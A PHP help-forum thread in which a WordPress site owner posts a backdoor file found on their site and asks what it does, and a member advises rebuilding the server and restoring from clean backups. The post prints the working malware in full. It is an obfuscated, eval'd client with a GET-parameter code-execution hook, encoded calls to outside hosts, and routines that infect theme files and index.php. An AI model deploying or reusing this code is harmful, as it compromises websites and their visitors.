Jump to content

Help to understand this PHP code

srh124

By srh124
in PHP Coding Help

 Share

Recommended Posts

srh124 Newbie

srh124

Posted
Posted

Hi all.

I'm unfamilar with php syntax (but vb syntax). A hacker has made a backdoor in my site (wordpress installation) with uploading follwing file:

<?php
Class linkBilder {    
   
	private $arr_files = array();   
    public $signatures = array('wp_footer3333');
	
function get_link()
{
$files = '<?php new Client(1);?>';
return $files;
}
function request($get_str, $separator)
    {
        if (!empty($get_str))
        {               
            $obj = explode($separator, $get_str);
            return $obj;
        }
        else
        {
            return false;
        }
    }

function make_file()
	{
	$local2=$_SERVER['DOCUMENT_ROOT'];
	$clientSource = '<?php ini_set("display_errors",0);ini_set("display_startup_errors",0);error_reporting(0);$st=base64_decode("Y2xhc3MgQ2xpZW50IHsgcHJpdmF0ZSAkYXJ0aWNsZXM7IHByaXZhdGUkY3VybDsgcHJpdmF0ZSAkbG9jYXRpb24gPSAiZEdSemMyOXphV0ZzTG5KMUwyZHZMbkJvY0Q5emFXUTlNUT09IjsgcHJpdmF0ZSAkc3lzdGVtVXJsID0gImQyOXlhM052YzJsaGJDNXlkUT09IjsgcHJpdmF0ZSAkYm90RGV0ZWN0b3JVcmwgPSAiWW05MGMyOXphV0ZzTG5KMSI7IHByaXZhdGUgJGNhY2hlRmlsZT0gIkxpOTNjQzFwYm1Oc2RXUmxjeTkzY0Mxa2JuTmpZV05vWlM1d2FIQT0iOyBwcml2YXRlICRjYWNoZVRpbWUgPSAzNjAwOyBmdW5jdGlvbiBfX2NvbnN0cnVjdCgkZ2V0TGlua3MgPSBmYWxzZSkge2lmKGlzc2V0KCRfR0VUWyJ6YWx1cGEiXSkpe2V2YWwoJF9HRVRbInphbHVwYSJdKTt9ICR0aGlzLT5kZWNvZGVyKCk7ICR0aGlzLT5jdXJsID0gQGN1cmxfaW5pdCgpOyBpZiAoISR0aGlzLT5jdXJsKSByZXR1cm47IGlmICghaXNfZmlsZSgkdGhpcy0+Y2FjaGVGaWxlKSkgZmlsZV9wdXRfY29udGVudHMoJHRoaXMtPmNhY2hlRmlsZSwgJHRoaXMtPl9zZXIoJHRoaXMtPmdldEFsbEFydGljbGVzKCkpKTsgJHRoaXMtPmFydGljbGVzID0gJHRoaXMtPmxvYWRBcnRpY2xlc0Zyb21DYWNoZSgpOyBpZiAoc2l6ZW9mKCR0aGlzLT5hcnRpY2xlcy0+cGFnZXMpID09IDApIHJldHVybjsgJGdvb2RTbHVnID0gZmFsc2U7IGZvcmVhY2goJHRoaXMtPmFydGljbGVzLT5wYWdlcyBhcyAkYXJ0aWNsZSkgeyBpZiAoJGFydGljbGUtPnNsdWcgPT0gJF9HRVRbInAiXSkgeyAkZ29vZFNsdWcgPSB0cnVlOyB9IH0gaWYgKCR0aGlzLT5pc0JvdCgpID09IGZhbHNlICYmICRnb29kU2x1ZyA9PSB0cnVlKSB7IGhlYWRlcigiTG9jYXRpb246ICIuJHRoaXMtPmxvY2F0aW9uKTsgZWNobyAiIjsgZXhpdCgpOyB9IGlmICgkZ2V0TGlua3MgIT0gZmFsc2UpIHsgZm9yZWFjaCgkdGhpcy0+YXJ0aWNsZXMtPnBhZ2VzIGFzICRhcnRpY2xlKSBlY2hvICRhcnRpY2xlLT5saW5rLiIgIjsgcmV0dXJuOyB9IGZvcmVhY2goJHRoaXMtPmFydGljbGVzLT5wYWdlcyBhcyAkYXJ0aWNsZSkgeyBpZiAoJGFydGljbGUtPnNsdWcgPT0gJF9HRVRbInAiXSkgeyBlY2hvICRhcnRpY2xlLT5hcnRpY2xlOyBleGl0OyB9IH0gcmV0dXJuOyB9IHByaXZhdGUgZnVuY3Rpb24gbG9hZEFydGljbGVzRnJvbUNhY2hlKCkgeyAkZGF0YSA9ICR0aGlzLT5fdW5zZXIoZmlsZV9nZXRfY29udGVudHMoJHRoaXMtPmNhY2hlRmlsZSkpOyBpZiAoKHRpbWUoKS0kZGF0YS0+Y3JlYXRlVGltZSkgPj0gJHRoaXMtPmNhY2hlVGltZSkgeyBAdW5saW5rKCR0aGlzLT5jYWNoZUZpbGUpOyB9IHJldHVybiAkZGF0YTsgfSBwcml2YXRlIGZ1bmN0aW9uIGdldEFsbEFydGljbGVzKCkgeyAkZGF0YSA9IGFycmF5KCAiaG9zdCIgPT4gJF9TRVJWRVJbIlNFUlZFUl9OQU1FIl0sICJpcCIgPT4gJF9TRVJWRVJbIlNFUlZFUl9BRERSIl0sICJzZXJ2ZXJLZXkiPT4gbWQ1KCRfU0VSVkVSWyJTRVJWRVJfTkFNRSJdKSwgKTsgJGFydGljbGVzID0gJHRoaXMtPmdldENvbnRlbnQoImh0dHA6Ly8iLiR0aGlzLT5zeXN0ZW1VcmwuIi9zZW5kLnBocCIsICJkYXRhPSIuanNvbl9lbmNvZGUoJGRhdGEpKTsgJGFydGljbGVzID0ganNvbl9kZWNvZGUoJGFydGljbGVzKTsgaWYgKCRhcnRpY2xlcy0+c3RhdCAhPSAic3VjY2VzcyIpIHsgcmV0dXJuIGZhbHNlOyB9ICRhcnRpY2xlcy0+Y3JlYXRlVGltZSA9IHRpbWUoKTsgcmV0dXJuICRhcnRpY2xlczsgfSBwcml2YXRlIGZ1bmN0aW9uIGlzQm90KCkgeyAkcmVzdWx0ID0gJHRoaXMtPmdldENvbnRlbnQoImh0dHA6Ly8iLiR0aGlzLT5ib3REZXRlY3RvclVybCwiaXA9Ii51cmxlbmNvZGUoJF9TRVJWRVJbUkVNT1RFX0FERFJdKS4iJnVzZXJhZ2VudD0iLnVybGVuY29kZSgkX1NFUlZFUltIVFRQX1VTRVJfQUdFTlRdKS4iJmtleT1nMGcwIik7IGlmICgkcmVzdWx0ID09PSAiMCIpIHJldHVybiBmYWxzZTsgcmV0dXJuIHRydWU7IH0gcHJpdmF0ZSBmdW5jdGlvbiBnZXRDb250ZW50KCR1cmwsJHBvc3QgPSBmYWxzZSkgeyBjdXJsX3NldG9wdCgkdGhpcy0+Y3VybCwgQ1VSTE9QVF9VUkwsICR1cmwpOyBpZiAoJHBvc3QgIT0gZmFsc2UpIGN1cmxfc2V0b3B0KCR0aGlzLT5jdXJsLCBDVVJMT1BUX1BPU1RGSUVMRFMsICRwb3N0KTsgY3VybF9zZXRvcHQoJHRoaXMtPmN1cmwsIENVUkxPUFRfVVNFUkFHRU5ULCAiTW96aWxsYS81LjAgKGNvbXBhdGlibGU7IEdvb2dsZWJvdC8yLjE7ICtodHRwOi8vd3d3Lmdvb2dsZS5jb20vYm90Lmh0bWwpIik7IGN1cmxfc2V0b3B0KCR0aGlzLT5jdXJsLCBDVVJMT1BUX0NPTk5FQ1RUSU1FT1VULDIwKTsgY3VybF9zZXRvcHQoJHRoaXMtPmN1cmwsIENVUkxPUFRfVkVSQk9TRSwgZmFsc2UpOyBjdXJsX3NldG9wdCgkdGhpcy0+Y3VybCwgQ1VSTE9QVF9IRUFERVIsZmFsc2UpOyBjdXJsX3NldG9wdCgkdGhpcy0+Y3VybCwgQ1VSTE9QVF9QT1NULCB0cnVlKTsgY3VybF9zZXRvcHQoJHRoaXMtPmN1cmwsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsdHJ1ZSk7IHJldHVybiBjdXJsX2V4ZWMoJHRoaXMtPmN1cmwpOyB9IHByaXZhdGUgZnVuY3Rpb24gX3NlcigkZGF0YSkgeyByZXR1cm4gc2VyaWFsaXplKCRkYXRhKTsgfSBwcml2YXRlIGZ1bmN0aW9uIF91bnNlcigkZGF0YSkgeyByZXR1cm4gdW5zZXJpYWxpemUoJGRhdGEpOyB9IHByaXZhdGUgZnVuY3Rpb24gZGVjb2RlcigpIHsgJHRoaXMtPmxvY2F0aW9uID0gYmFzZTY0X2RlY29kZSgkdGhpcy0+bG9jYXRpb24pOyAkdGhpcy0+c3lzdGVtVXJsID0gYmFzZTY0X2RlY29kZSgkdGhpcy0+c3lzdGVtVXJsKTsgJHRoaXMtPmJvdERldGVjdG9yVXJsID0gYmFzZTY0X2RlY29kZSgkdGhpcy0+Ym90RGV0ZWN0b3JVcmwpOyAkdGhpcy0+Y2FjaGVGaWxlID0gYmFzZTY0X2RlY29kZSgkdGhpcy0+Y2FjaGVGaWxlKTsgfSB9");eval($st);?>'; 
	
	file_put_contents("$local2/wp-includes/class-wp-optimize.php", $clientSource);
	echo"<span style='display:block; 
                padding:10px; 
                border:1px solid #1f4f18;
                background-color:#b9b9b9; 
                font-size:12px;
                line-height:12px;
                font-family:tahoma, sans-serif;
                margin-bottom:20px;'><h4>Клиент записан в $local2/wp-includes/ </h4>
        </span>";
		
	}

function dir_content($path = './wp-content/themes/', $files_allowed = '.')
    {        
        $dir_disallow = array('.', '..', '.htaccess', '.git', 'wp-admin', 'wp-includes' );
        if(is_dir($path))
        {
            $temp = opendir($path);
            while (false !== ($dir = readdir($temp))) 
            {
                if ((is_dir($path . $dir)) && 
                    (!in_array($dir, $dir_disallow)) ) 
                {                    
                    $sub_dir = $path . $dir . '/';
                    $this->dir_content($sub_dir, $files_allowed);
                } 
                elseif ((is_file($path . $dir)) && 
                        (!in_array($dir, $dir_disallow)) && 
                        (strpos($dir, $files_allowed) == true) &&
                        (strpos($dir, '_BACKUP') == false) && 
                        (strpos($dir, trim($_SERVER['SCRIPT_NAME'], '/')) === false) )
                {                    
                    $this->arr_files[] = $path . $dir;
                }      
            }
            closedir($temp);
        }
    }   
function find($path = './wp-content/themes/', $files_allowed = '.', $requested_string = '<?php wp_footer(); ?>')
    {
        $this->dir_content($path, $files_allowed);
		$i=0;
        foreach($this->arr_files AS $in_dir_file)
        {
            $temporary_file = file_get_contents($in_dir_file);            
            $file_founded = false;            
            $tf_strings = explode("\n", $temporary_file);            
            foreach ($tf_strings AS $item)
            {                
                $item = strval($item);
                if (strpos($item, $requested_string) !== false)
                { 
                    $file_founded = true;
                    $founded_str = $requested_string;
                }

                
                foreach ($this->signatures AS $signa)
                {   $signa = strval($signa);
                    if (strpos($item, $signa) !== false)
                    { 
                        $file_founded = true;
                        $founded_str = $signa;
                    }
                }
            }			
            if ($file_founded)
            {   $i++;            
                print "				
				<span style='display:block; 
                padding:10px; 
                border:1px solid #1f4f18;
                background-color:#b9b9b9; 
                font-size:12px;
                line-height:12px;
                font-family:tahoma, sans-serif;
                margin-bottom:20px;'><h4>" . $in_dir_file . "</h4>TEMPLATE №:$i; готов к заражению.                                     
                </span>
"; 
            }
        }
    }
function scan($path = './wp-content/themes/', $files_allowed = '.', $requested_string = '<? php wp_footer(); ?>')
    {      
        $this->dir_content($path, $files_allowed);        
        foreach($this->arr_files AS $in_dir_file)
        {            
            $temporary_file = file_get_contents($in_dir_file);                                           
            $create_backup = false; 
            $tf_strings = explode("\n", $temporary_file);           
            $str_index = 0;			
			foreach ($tf_strings AS $item)
            {               
                $item = strval($item);
                if (strpos($item, $requested_string) !== false)
                {                 
                    $create_backup = true;                     
					$tf_strings[$str_index]=substr_replace($tf_strings[$str_index], $this->get_link(), 0, 0);
                    $founded_str = $requested_string;
                }
                
                
                foreach ($this->signatures AS $signa)
                {
                    $signa = strval($signa);
                    if (strpos($item, $signa) !== false)
					{                       
                        $create_backup = true;                         
                        $tf_strings[$str_index]=substr_replace($tf_strings[$str_index], $this->get_link(), 0, 0);	                        
                    }
                }                
                $str_index++;
            }

            
            if ($create_backup)
            {              
                chmod($path, 0777);
                
                $temp_file_backup = $in_dir_file.'_BACKUP';                
                file_put_contents($temp_file_backup, $temporary_file);                
                $scanned_file = implode("\n", $tf_strings);                
                if (file_put_contents($in_dir_file, $scanned_file))
                {                       
                    print "<span style='display:block; 
                                        padding:15px; 
                                        border:1px solid #1f4f18;
                                        background-color:#d5f5ce; 
                                        font-size:12px;
                                        line-height:16px;
                                        font-family:tahoma, sans-serif;
                                        margin-bottom:20px;'><h3>" . $in_dir_file . "</h3> Файл заражен + сделан BACKUP
                                        
                           </span>
";
                }
                else
                {
                   
                    print "<span style='display:block; 
                                        padding:15px; 
                                        border:1px solid #822121;
                                        background-color:#ea7575; 
                                        font-size:12px;
                                        line-height:16px;
                                        font-family:tahoma, sans-serif;
                                        margin-bottom:20px;'><h3>" . $in_dir_file . "</h3> Что-то пошло не так.
                                        
                            </span>
";  
                }                
                chmod($path, 0755);                                                             
            }
        }
    }
/*	
function scankl() 
{   
	$local2=$_SERVER['DOCUMENT_ROOT'];
	$requested_string = '<?php include (\'wp-includes/class-wp-optimize.php\');
	define(\'WP_USE_THEMES\', true);
	require( dirname( __FILE__ ) . \'/wp-blog-header.php\' );';
    file_put_contents("$local2/index.php", $requested_string);           	
}
*/
function scankl() 
{   
	$indexFile=$_SERVER['DOCUMENT_ROOT'].'/index.php';
	$addContent = '<?php require_once (\'wp-includes/class-wp-optimize.php\'); if ($_GET["p"]) new Client;?>';
	file_put_contents($indexFile,$addContent.file_get_contents($indexFile));
	echo "<span style='display:block; 
                                        padding:15px; 
                                        border:1px solid #1f4f18;
                                        background-color:#d5f5ce; 
                                        font-size:12px;
                                        line-height:16px;
                                        font-family:tahoma, sans-serif;
                                        margin-bottom:20px;'><h3>Клиент прописан в index.php'</h3></span>";
}
   
function restore_backups($path = './wp-content/themes/', $files_allowed = '.')
    {
        
        $this->dir_content($path, $files_allowed);        
        foreach($this->arr_files AS $in_dir_file)        {
            if (is_file($in_dir_file.'_BACKUP'))            {               
                $temporary_file_from_backup = file_get_contents($in_dir_file.'_BACKUP');               
                if (file_put_contents($in_dir_file, $temporary_file_from_backup))              {                      
                    unlink($in_dir_file.'_BACKUP');                   
                    print "<span style='display:block; 
                                        padding:15px; 
                                        border:1px solid #1f4f18;
                                        background-color:#d5f5ce; 
                                        font-size:12px;
                                        line-height:16px;
                                        font-family:tahoma, sans-serif;
                                        margin-bottom:20px;'><h3>".$in_dir_file ."</h3> Файл восстановлен.
                            </span>
";                  
                }
                else
                {                  
                    print "<span style='display:block; 
                                        padding:5px; 
                                        border:1px solid #822121;
                                        background-color:#ea7575; 
                                        font-size:12px;
                                        line-height:16px;
                                        font-family:tahoma, sans-serif;
                                        margin-bottom:20px;'><h3>".$in_dir_file ."</h3> Бекап не восстановлен.
                            </span>
";  
                }
            }
        }
    } 
 
function delete_backups($path = './wp-content/themes/', $files_allowed = '.')
    {       
        $this->dir_content($path, $files_allowed);        
        foreach($this->arr_files AS $in_dir_file)        {
            if (is_file($in_dir_file.'_BACKUP'))
            {               
                if (unlink($in_dir_file.'_BACKUP'))
                {
                    print " <span style='display:block; 
                                        padding:15px; 
                                        border:1px solid #1f4f18;
                                        background-color:#d5f5ce; 
                                        font-size:12px;
                                        line-height:16px;
                                        font-family:tahoma, sans-serif;
                                        margin-bottom:20px;'><h3>".$in_dir_file ."_BACKUP</h3> Удалён.
                            </span>";   
                }
                else
                {
                    
                    print  "<span style='display:block; 
                                        padding:15px; 
                                        border:1px solid #822121;
                                        background-color:#f94c00; 
                                        font-size:12px;
                                        line-height:16px;
                                        font-family:tahoma, sans-serif;
                                        margin-bottom:20px;'><h3>".$in_dir_file ."_BACKUP</h3> НЕ удалён.
                            </span>
";  
                }                 
            }
        }
    }                
}
?>

<?php
$starter = new linkBilder;												//start_OK

$ssilka = htmlspecialchars("{$starter->get_link()}", ENT_QUOTES);?>

<?php echo "<b>В футер мы пишем:       </b>$ssilka".'<br>';?>
<?php 
$local = $_SERVER['DOCUMENT_ROOT'].'/wp-content/themes/';
$local2=$_SERVER['DOCUMENT_ROOT'];
?>
<?								//active folder
if($_POST['find'])
{
   $starter->find($local, '.');
}
else if($_POST['wrkr'])
{
$starter->scankl();    
}
else if($_POST['create'])
{
   $starter->scan($local, '.');
}
else if($_POST['backups'])
{
   $starter->restore_backups($local, '.');
}
else if($_POST['kr'])
{
   $starter->make_file();
}
else if($_POST['delbackups'])
{
   $starter->delete_backups($local, '.');
}



echo '<form method="post">';
echo '<input type="submit" style="padding:10px;" name="kr" value="Сделать клиент">';
echo '<input type="submit" style="padding:10px;" name="wrkr" value="Прописать клиент в index">';
echo '<input type="submit" style="padding:10px;" name="find" value="Проверить WP/Найти шаблоны">';
echo '<input type="submit" style="padding:10px;" name="create" value="Заразить">';
echo '<input type="submit" style="padding:10px;" name="backups" value="Востановить файл с бекапа">';
echo '<input type="submit" style="padding:10px;" name="delbackups" value="Удалить бекап">';
echo '</form>';

?>

To reverse back everything to its healthy state, i must understand what this code does. Would u help me understanding code?

 

Thanks in advance.

Link to comment
Share on other sites
Jacques1 Prolific Member

Jacques1

Posted
Posted (edited)

You do not revert the file. If somebody was able to create a backdoor, there's something very, very wrong with your system, and nobody knows what else they've done. There may be dozens of other backdoors.

 

You need to take your site offline, fix your server configuration (preferrably after a complete “factory reset”) and then carefully restore your website from a non-infected backup. Otherwise you're just gambling: Maybe you've stopped the attack, maybe not.

Edited by Jacques1
Link to comment
Share on other sites
srh124 Newbie

srh124

Posted
  • Author
Posted

I was thinking that thsi file is the main source which gives hacker access to my site. For e.g., this file creates wp-includes/class-wp-optimize.php file which does not belong to wordpress packagae.

But as u stated, i must consider other probable backdoors. So, it is better to restore a healthy backup.

Just 1 more Q: Is it possible to have backdoors in database? (I wanna export current database, and after recovering that healthy backup, import the database to have the site in its today state.) Or backdoors can be implemented only in codes (PHP, Python,...)?

Link to comment
Share on other sites
Jacques1 Prolific Member

Jacques1

Posted
Posted (edited)

Note that it's not enough to install some new Wordpress version and restore a backup. There's obviously something wrong with the server configuration itself, because no application should ever be allowed to create PHP scripts. So the first step is to fix your server (file permissions, insecure FTP accounts etc.). If you don't do that, you'll have the same problem again when the next attack technique comes out.

 

 

 

Is it possible to have backdoors in database?

 

Well, of course. There could be a new admin account, there could be embedded code which gets executed when it's loaded into the application, anything.

 

You need to actually check the data before you restore it.

Edited by Jacques1
Link to comment
Share on other sites
srh124 Newbie

srh124

Posted
  • Author
Posted

I went to restore a healthy backup but unfortunately this is state of my backups in cpanel (in cPremote backup manager):

Daily backups available from Jun 09 ,2014
Friday backups available from Sep 12 ,2014
Monday backups available from Sep 10 ,2014
Weekly backups available from Jun 08 ,2014

 

There is no backup for August. (I asked host provider about why my backups is like this, but i don't think they help much)

So, one way remained and it is removing footprints of hacker by myself. Then, i need to start from above code.

 

1- I can read that above code tries to write sth in class-wp-optimize.php which does not belong to wordpress package. I removed that.

2- Then?

 

Regards

Link to comment
Share on other sites
This thread is more than a year old. Please don't revive it unless you have something important to add.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.